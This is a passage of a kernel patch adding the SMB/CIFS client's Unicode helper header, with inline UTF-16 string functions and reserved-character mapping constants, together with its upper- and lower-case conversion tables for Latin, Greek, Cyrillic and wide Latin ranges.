++#define SFM_LESSTHAN    ((__u16) 0xF023)
++#define SFM_PIPE        ((__u16) 0xF027)
++#define SFM_SLASH       ((__u16) 0xF026)
++#define SFM_SPACE	((__u16) 0xF028)
++#define SFM_PERIOD	((__u16) 0xF029)
++
++/*
++ * Mapping mechanism to use when one of the seven reserved characters is
++ * encountered.  We can only map using one of the mechanisms at a time
++ * since otherwise readdir could return directory entries which we would
++ * not be able to open.
++ *
++ * NO_MAP_UNI_RSVD  = do not perform any remapping of the character
++ * SFM_MAP_UNI_RSVD = map reserved characters using SFM scheme (MAC compatible)
++ * SFU_MAP_UNI_RSVD = map reserved characters ala SFU ("mapchars" option)
++ *
++ */
++#define NO_MAP_UNI_RSVD		0
++#define SFM_MAP_UNI_RSVD	1
++#define SFU_MAP_UNI_RSVD	2
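++
++/*
++ * For reference, the cifs mount options "mapchars" and "mapposix" select
++ * the SFU and SFM mappings, respectively.
++ */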
++
++/* Just define what we want from uniupr.h.  We don't want to define the tables
++ * in each source file.
++ */
++#ifndef	UNICASERANGE_DEFINED
++struct UniCaseRange {
++	wchar_t start;
++	wchar_t end;
++	signed char *table;
++};
++#endif				/* UNICASERANGE_DEFINED */
++
++#ifndef UNIUPR_NOUPPER
++extern signed char CifsUniUpperTable[512];
++extern const struct UniCaseRange CifsUniUpperRange[];
++#endif				/* UNIUPR_NOUPPER */
++
++#ifndef UNIUPR_NOLOWER
++extern signed char CifsUniLowerTable[512];
++extern const struct UniCaseRange CifsUniLowerRange[];
++#endif				/* UNIUPR_NOLOWER */
++
++#ifdef __KERNEL__
++int cifs_from_utf16(char *to, const __le16 *from, int tolen, int fromlen,
++		    const struct nls_table *cp, int map_type);
++int cifs_utf16_bytes(const __le16 *from, int maxbytes,
++		     const struct nls_table *codepage);
++int cifs_strtoUTF16(__le16 *, const char *, int, const struct nls_table *);
++char *cifs_strndup_from_utf16(const char *src, const int maxlen,
++			      const bool is_unicode,
++			      const struct nls_table *codepage);
++extern int cifsConvertToUTF16(__le16 *target, const char *source, int maxlen,
++			      const struct nls_table *cp, int mapChars);
++extern int cifs_remap(struct cifs_sb_info *cifs_sb);
++extern __le16 *cifs_strndup_to_utf16(const char *src, const int maxlen,
++				     int *utf16_len, const struct nls_table *cp,
++				     int remap);
++#endif
++
++wchar_t cifs_toupper(wchar_t in);
++
++/*
++ * UniStrcat:  Concatenate the second string to the first
++ *
++ * Returns:
++ *     Address of the first string
++ */
++static inline __le16 *
++UniStrcat(__le16 *ucs1, const __le16 *ucs2)
++{
++	__le16 *anchor = ucs1;	/* save a pointer to start of ucs1 */
++
++	while (*ucs1++) ;	/* To end of first string */
++	ucs1--;			/* Return to the null */
++	while ((*ucs1++ = *ucs2++)) ;	/* copy string 2 over */
++	return anchor;
++}
++
++/*
++ * UniStrchr:  Find a character in a string
++ *
++ * Returns:
++ *     Address of first occurrence of character in string
++ *     or NULL if the character is not in the string
++ */
++static inline wchar_t *
++UniStrchr(const wchar_t *ucs, wchar_t uc)
++{
++	while ((*ucs != uc) && *ucs)
++		ucs++;
++
++	if (*ucs == uc)
++		return (wchar_t *) ucs;
++	return NULL;
++}
++
++/*
++ * UniStrcmp:  Compare two strings
++ *
++ * Returns:
++ *     < 0:  First string is less than second
++ *     = 0:  Strings are equal
++ *     > 0:  First string is greater than second
++ */
++static inline int
++UniStrcmp(const wchar_t *ucs1, const wchar_t *ucs2)
++{
++	while ((*ucs1 == *ucs2) && *ucs1) {
++		ucs1++;
++		ucs2++;
++	}
++	return (int) *ucs1 - (int) *ucs2;
++}
++
++/*
++ * UniStrcpy:  Copy a string
++ */
++static inline wchar_t *
++UniStrcpy(wchar_t *ucs1, const wchar_t *ucs2)
++{
++	wchar_t *anchor = ucs1;	/* save the start of result string */
++
++	while ((*ucs1++ = *ucs2++)) ;
++	return anchor;
++}
++
++/*
++ * UniStrlen:  Return the length of a string (in 16 bit Unicode chars not bytes)
++ */
++static inline size_t
++UniStrlen(const wchar_t *ucs1)
++{
++	int i = 0;
++
++	while (*ucs1++)
++		i++;
++	return i;
++}
++
++/*
++ * UniStrnlen:  Return the length (in 16 bit Unicode chars not bytes) of a
++ *		string (length limited)
++ */
++static inline size_t
++UniStrnlen(const wchar_t *ucs1, int maxlen)
++{
++	int i = 0;
++
++	while (*ucs1++) {
++		i++;
++		if (i >= maxlen)
++			break;
++	}
++	return i;
++}
++
++/*
++ * UniStrncat:  Concatenate length limited string
++ */
++static inline wchar_t *
++UniStrncat(wchar_t *ucs1, const wchar_t *ucs2, size_t n)
++{
++	wchar_t *anchor = ucs1;	/* save pointer to string 1 */
++
++	while (*ucs1++) ;
++	ucs1--;			/* point to null terminator of s1 */
++	while (n-- && (*ucs1 = *ucs2)) {	/* copy s2 after s1 */
++		ucs1++;
++		ucs2++;
++	}
++	*ucs1 = 0;		/* Null terminate the result */
++	return (anchor);
++}
++
++/*
++ * UniStrncmp:  Compare length limited string
++ */
++static inline int
++UniStrncmp(const wchar_t *ucs1, const wchar_t *ucs2, size_t n)
++{
++	if (!n)
++		return 0;	/* Null strings are equal */
++	while ((*ucs1 == *ucs2) && *ucs1 && --n) {
++		ucs1++;
++		ucs2++;
++	}
++	return (int) *ucs1 - (int) *ucs2;
++}
++
++/*
++ * UniStrncmp_le:  Compare length limited string - native to little-endian
++ */
++static inline int
++UniStrncmp_le(const wchar_t *ucs1, const wchar_t *ucs2, size_t n)
++{
++	if (!n)
++		return 0;	/* Null strings are equal */
++	while ((*ucs1 == __le16_to_cpu(*ucs2)) && *ucs1 && --n) {
++		ucs1++;
++		ucs2++;
++	}
++	return (int) *ucs1 - (int) __le16_to_cpu(*ucs2);
++}
++
++/*
++ * UniStrncpy:  Copy length limited string with pad
++ */
++static inline wchar_t *
++UniStrncpy(wchar_t *ucs1, const wchar_t *ucs2, size_t n)
++{
++	wchar_t *anchor = ucs1;
++
++	while (n-- && *ucs2)	/* Copy the strings */
++		*ucs1++ = *ucs2++;
++
++	n++;
++	while (n--)		/* Pad with nulls */
++		*ucs1++ = 0;
++	return anchor;
++}
++
++/*
++ * UniStrncpy_le:  Copy length limited string with pad to little-endian
++ */
++static inline wchar_t *
++UniStrncpy_le(wchar_t *ucs1, const wchar_t *ucs2, size_t n)
++{
++	wchar_t *anchor = ucs1;
++
++	while (n-- && *ucs2)	/* Copy the strings */
++		*ucs1++ = __le16_to_cpu(*ucs2++);
++
++	n++;
++	while (n--)		/* Pad with nulls */
++		*ucs1++ = 0;
++	return anchor;
++}
++
++/*
++ * UniStrstr:  Find a string in a string
++ *
++ * Returns:
++ *     Address of first match found
++ *     NULL if no matching string is found
++ */
++static inline wchar_t *
++UniStrstr(const wchar_t *ucs1, const wchar_t *ucs2)
++{
++	const wchar_t *anchor1 = ucs1;
++	const wchar_t *anchor2 = ucs2;
++
++	while (*ucs1) {
++		if (*ucs1 == *ucs2) {
++			/* Partial match found */
++			ucs1++;
++			ucs2++;
++		} else {
++			if (!*ucs2)	/* Match found */
++				return (wchar_t *) anchor1;
++			ucs1 = ++anchor1;	/* No match */
++			ucs2 = anchor2;
++		}
++	}
++
++	if (!*ucs2)		/* Both end together */
++		return (wchar_t *) anchor1;	/* Match found */
++	return NULL;		/* No match */
++}
++
++#ifndef UNIUPR_NOUPPER
++/*
++ * UniToupper:  Convert a unicode character to upper case
++ */
++static inline wchar_t
++UniToupper(register wchar_t uc)
++{
++	register const struct UniCaseRange *rp;
++
++	if (uc < sizeof(CifsUniUpperTable)) {
++		/* Latin characters */
++		return uc + CifsUniUpperTable[uc];	/* Use base tables */
++	} else {
++		rp = CifsUniUpperRange;	/* Use range tables */
++		while (rp->start) {
++			if (uc < rp->start)	/* Before start of range */
++				return uc;	/* Uppercase = input */
++			if (uc <= rp->end)	/* In range */
++				return uc + rp->table[uc - rp->start];
++			rp++;	/* Try next range */
++		}
++	}
++	return uc;		/* Past last range */
++}
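++
++/*
++ * For example, UniToupper('a') returns 'a' + CifsUniUpperTable[0x61],
++ * i.e. 0x61 - 32 == 0x41 ('A'), while Cyrillic 0x0430 is looked up in
++ * the 0x0430-0x045f range table and becomes 0x0410.
++ */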
++
++/*
++ * UniStrupr:  Upper case a unicode string
++ */
++static inline __le16 *
++UniStrupr(register __le16 *upin)
++{
++	register __le16 *up;
++
++	up = upin;
++	while (*up) {		/* For all characters */
++		*up = cpu_to_le16(UniToupper(le16_to_cpu(*up)));
++		up++;
++	}
++	return upin;		/* Return input pointer */
++}
++#endif				/* UNIUPR_NOUPPER */
++
++#ifndef UNIUPR_NOLOWER
++/*
++ * UniTolower:  Convert a unicode character to lower case
++ */
++static inline wchar_t
++UniTolower(register wchar_t uc)
++{
++	register const struct UniCaseRange *rp;
++
++	if (uc < sizeof(CifsUniLowerTable)) {
++		/* Latin characters */
++		return uc + CifsUniLowerTable[uc];	/* Use base tables */
++	} else {
++		rp = CifsUniLowerRange;	/* Use range tables */
++		while (rp->start) {
++			if (uc < rp->start)	/* Before start of range */
++				return uc;	/* Lowercase = input */
++			if (uc <= rp->end)	/* In range */
++				return uc + rp->table[uc - rp->start];
++			rp++;	/* Try next range */
++		}
++	}
++	return uc;		/* Past last range */
++}
++
++/*
++ * UniStrlwr:  Lower case a unicode string
++ */
++static inline wchar_t *
++UniStrlwr(register wchar_t *upin)
++{
++	register wchar_t *up;
++
++	up = upin;
++	while (*up) {		/* For all characters */
++		*up = UniTolower(*up);
++		up++;
++	}
++	return upin;		/* Return input pointer */
++}
++
++#endif
++
++#endif /* _CIFS_UNICODE_H */
+diff --git a/fs/smb/client/cifs_uniupr.h b/fs/smb/client/cifs_uniupr.h
+new file mode 100644
+index 0000000000000..7b272fcdf0d3a
+--- /dev/null
++++ b/fs/smb/client/cifs_uniupr.h
+@@ -0,0 +1,239 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (c) International Business Machines  Corp., 2000,2002
++ *
++ * uniupr.h - Unicode compressed case ranges
++ */
++
++#ifndef UNIUPR_NOUPPER
++/*
++ * Latin upper case
++ */
++signed char CifsUniUpperTable[512] = {
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 000-00f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 010-01f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 020-02f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 030-03f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 040-04f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 050-05f */
++	0, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,	/* 060-06f */
++	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, 0, 0, 0, 0, 0,	/* 070-07f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 080-08f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 090-09f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0a0-0af */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0b0-0bf */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0c0-0cf */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0d0-0df */
++	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,	/* 0e0-0ef */
++	-32, -32, -32, -32, -32, -32, -32, 0, -32, -32, -32, -32, -32, -32, -32, 121,	/* 0f0-0ff */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 100-10f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 110-11f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 120-12f */
++	0, 0, 0, -1, 0, -1, 0, -1, 0, 0, -1, 0, -1, 0, -1, 0,	/* 130-13f */
++	-1, 0, -1, 0, -1, 0, -1, 0, -1, 0, 0, -1, 0, -1, 0, -1,	/* 140-14f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 150-15f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 160-16f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, 0, -1, 0, -1, 0, -1, 0,	/* 170-17f */
++	0, 0, 0, -1, 0, -1, 0, 0, -1, 0, 0, 0, -1, 0, 0, 0,	/* 180-18f */
++	0, 0, -1, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0, 0,	/* 190-19f */
++	0, -1, 0, -1, 0, -1, 0, 0, -1, 0, 0, 0, 0, -1, 0, 0,	/* 1a0-1af */
++	-1, 0, 0, 0, -1, 0, -1, 0, 0, -1, 0, 0, 0, -1, 0, 0,	/* 1b0-1bf */
++	0, 0, 0, 0, 0, -1, -2, 0, -1, -2, 0, -1, -2, 0, -1, 0,	/* 1c0-1cf */
++	-1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, -79, 0, -1, /* 1d0-1df */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e0-1ef */
++	0, 0, -1, -2, 0, -1, 0, 0, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1f0-1ff */
++};
++
++/* Upper case range - Greek */
++static signed char UniCaseRangeU03a0[47] = {
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -38, -37, -37, -37,	/* 3a0-3af */
++	0, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,	/* 3b0-3bf */
++	-32, -32, -31, -32, -32, -32, -32, -32, -32, -32, -32, -32, -64,
++	-63, -63,
++};
++
++/* Upper case range - Cyrillic */
++static signed char UniCaseRangeU0430[48] = {
++	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,	/* 430-43f */
++	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,	/* 440-44f */
++	0, -80, -80, -80, -80, -80, -80, -80, -80, -80, -80, -80, -80, 0, -80, -80,	/* 450-45f */
++};
++
++/* Upper case range - Extended cyrillic */
++static signed char UniCaseRangeU0490[61] = {
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 490-49f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 4a0-4af */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 4b0-4bf */
++	0, 0, -1, 0, -1, 0, 0, 0, -1, 0, 0, 0, -1,
++};
++
++/* Upper case range - Extended latin and greek */
++static signed char UniCaseRangeU1e00[509] = {
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e00-1e0f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e10-1e1f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e20-1e2f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e30-1e3f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e40-1e4f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e50-1e5f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e60-1e6f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e70-1e7f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e80-1e8f */
++	0, -1, 0, -1, 0, -1, 0, 0, 0, 0, 0, -59, 0, -1, 0, -1,	/* 1e90-1e9f */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ea0-1eaf */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1eb0-1ebf */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ec0-1ecf */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ed0-1edf */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ee0-1eef */
++	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, 0, 0, 0, 0, 0,	/* 1ef0-1eff */
++	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f00-1f0f */
++	8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f10-1f1f */
++	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f20-1f2f */
++	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f30-1f3f */
++	8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f40-1f4f */
++	0, 8, 0, 8, 0, 8, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f50-1f5f */
++	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f60-1f6f */
++	74, 74, 86, 86, 86, 86, 100, 100, 0, 0, 112, 112, 126, 126, 0, 0,	/* 1f70-1f7f */
++	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f80-1f8f */
++	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f90-1f9f */
++	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fa0-1faf */
++	8, 8, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fb0-1fbf */
++	0, 0, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fc0-1fcf */
++	8, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fd0-1fdf */
++	8, 8, 0, 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fe0-1fef */
++	0, 0, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0,
++};
++
++/* Upper case range - Wide latin */
++static signed char UniCaseRangeUff40[27] = {
++	0, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,	/* ff40-ff4f */
++	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
++};
++
++/*
++ * Upper Case Range
++ */
++const struct UniCaseRange CifsUniUpperRange[] = {
++	{0x03a0, 0x03ce, UniCaseRangeU03a0},
++	{0x0430, 0x045f, UniCaseRangeU0430},
++	{0x0490, 0x04cc, UniCaseRangeU0490},
++	{0x1e00, 0x1ffc, UniCaseRangeU1e00},
++	{0xff40, 0xff5a, UniCaseRangeUff40},
++	{0}
++};
++#endif
++
++#ifndef UNIUPR_NOLOWER
++/*
++ * Latin lower case
++ */
++signed char CifsUniLowerTable[512] = {
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 000-00f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 010-01f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 020-02f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 030-03f */
++	0, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,	/* 040-04f */
++	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 0, 0, 0, 0, 0,	/* 050-05f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 060-06f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 070-07f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 080-08f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 090-09f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0a0-0af */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0b0-0bf */
++	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,	/* 0c0-0cf */
++	32, 32, 32, 32, 32, 32, 32, 0, 32, 32, 32, 32, 32, 32, 32, 0,	/* 0d0-0df */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0e0-0ef */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0f0-0ff */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 100-10f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 110-11f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 120-12f */
++	0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 1,	/* 130-13f */
++	0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0,	/* 140-14f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 150-15f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 160-16f */
++	1, 0, 1, 0, 1, 0, 1, 0, -121, 1, 0, 1, 0, 1, 0, 0,	/* 170-17f */
++	0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 79, 0,	/* 180-18f */
++	0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0,	/* 190-19f */
++	1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1,	/* 1a0-1af */
++	0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0,	/* 1b0-1bf */
++	0, 0, 0, 0, 2, 1, 0, 2, 1, 0, 2, 1, 0, 1, 0, 1,	/* 1c0-1cf */
++	0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0,	/* 1d0-1df */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e0-1ef */
++	0, 2, 1, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1f0-1ff */
++};
++
++/* Lower case range - Greek */
++static signed char UniCaseRangeL0380[44] = {
++	0, 0, 0, 0, 0, 0, 38, 0, 37, 37, 37, 0, 64, 0, 63, 63,	/* 380-38f */
++	0, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,	/* 390-39f */
++	32, 32, 0, 32, 32, 32, 32, 32, 32, 32, 32, 32,
++};
++
++/* Lower case range - Cyrillic */
++static signed char UniCaseRangeL0400[48] = {
++	0, 80, 80, 80, 80, 80, 80, 80, 80, 80, 80, 80, 80, 0, 80, 80,	/* 400-40f */
++	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,	/* 410-41f */
++	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,	/* 420-42f */
++};
++
++/* Lower case range - Extended cyrillic */
++static signed char UniCaseRangeL0490[60] = {
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 490-49f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 4a0-4af */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 4b0-4bf */
++	0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1,
++};
++
++/* Lower case range - Extended latin and greek */
++static signed char UniCaseRangeL1e00[504] = {
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e00-1e0f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e10-1e1f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e20-1e2f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e30-1e3f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e40-1e4f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e50-1e5f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e60-1e6f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e70-1e7f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e80-1e8f */
++	1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0,	/* 1e90-1e9f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ea0-1eaf */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1eb0-1ebf */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ec0-1ecf */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ed0-1edf */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ee0-1eef */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0,	/* 1ef0-1eff */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f00-1f0f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, 0, 0,	/* 1f10-1f1f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f20-1f2f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f30-1f3f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, 0, 0,	/* 1f40-1f4f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, -8, 0, -8, 0, -8, 0, -8,	/* 1f50-1f5f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f60-1f6f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f70-1f7f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f80-1f8f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f90-1f9f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1fa0-1faf */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -74, -74, -9, 0, 0, 0,	/* 1fb0-1fbf */
++	0, 0, 0, 0, 0, 0, 0, 0, -86, -86, -86, -86, -9, 0, 0, 0,	/* 1fc0-1fcf */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -100, -100, 0, 0, 0, 0,	/* 1fd0-1fdf */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -112, -112, -7, 0, 0, 0,	/* 1fe0-1fef */
++	0, 0, 0, 0, 0, 0, 0, 0,
++};
++
++/* Lower case range - Wide latin */
++static signed char UniCaseRangeLff20[27] = {
++	0, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,	/* ff20-ff2f */
++	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
++};
++
++/*
++ * Lower Case Range
++ */
++const struct UniCaseRange CifsUniLowerRange[] = {
